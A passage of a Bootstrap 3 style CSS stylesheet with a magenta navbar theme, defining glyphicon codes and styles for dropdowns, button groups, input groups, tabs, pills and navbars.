  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  list-style: none;
  font-size: 14px;
  text-align: left;
  background-color: #444444;
  border: 1px solid #444444;
  border-radius: 0px;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  background-clip: padding-box;
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: normal;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  background-color: #373737;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
  cursor: not-allowed;
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: auto;
  right: 0;
}
.dropdown-menu-left {
  left: 0;
  right: auto;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  left: 0;
  right: 0;
  bottom: 0;
  top: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  border-top: 0;
  border-bottom: 4px solid;
  content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: auto;
    right: 0;
  }
  .navbar-right .dropdown-menu-left {
    left: 0;
    right: auto;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-bottom-left-radius: 0px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  float: none;
  display: table-cell;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  margin-left: -1px;
}
.nav {
  margin-bottom: 0;
  padding-left: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  background-color: transparent;
  cursor: not-allowed;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #db00af;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0px 0px 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
  cursor: default;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0px;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #db00af;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0px;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  overflow-x: visible;
  padding-right: 15px;
  padding-left: 15px;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
    padding-right: 0;
  }
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -15px;
  margin-left: -15px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.navbar-brand {
  float: left;
  padding: 17.5px 15px;
  font-size: 18px;
  line-height: 20px;
  height: 55px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -15px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  margin-right: 15px;
  padding: 9px 10px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0px;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  margin-left: -15px;
  margin-right: -15px;
  padding: 10px 15px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    border: 0;
    margin-left: 0;
    margin-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-left: 15px;
    margin-right: 15px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -15px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #db00af;
  border-color: #c2009b;
}
.navbar-default .navbar-brand {
  color: #ffdbf8;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #ffa8ee;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #ffdbf8;
}
.navbar-default .navbar-nav > li > a {
  color: #ffdbf8;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-toggle {
  border-color: #db00af;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #db00af;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #c2009b;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffdbf8;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-link {
  color: #ffdbf8;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #ffdbf8;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
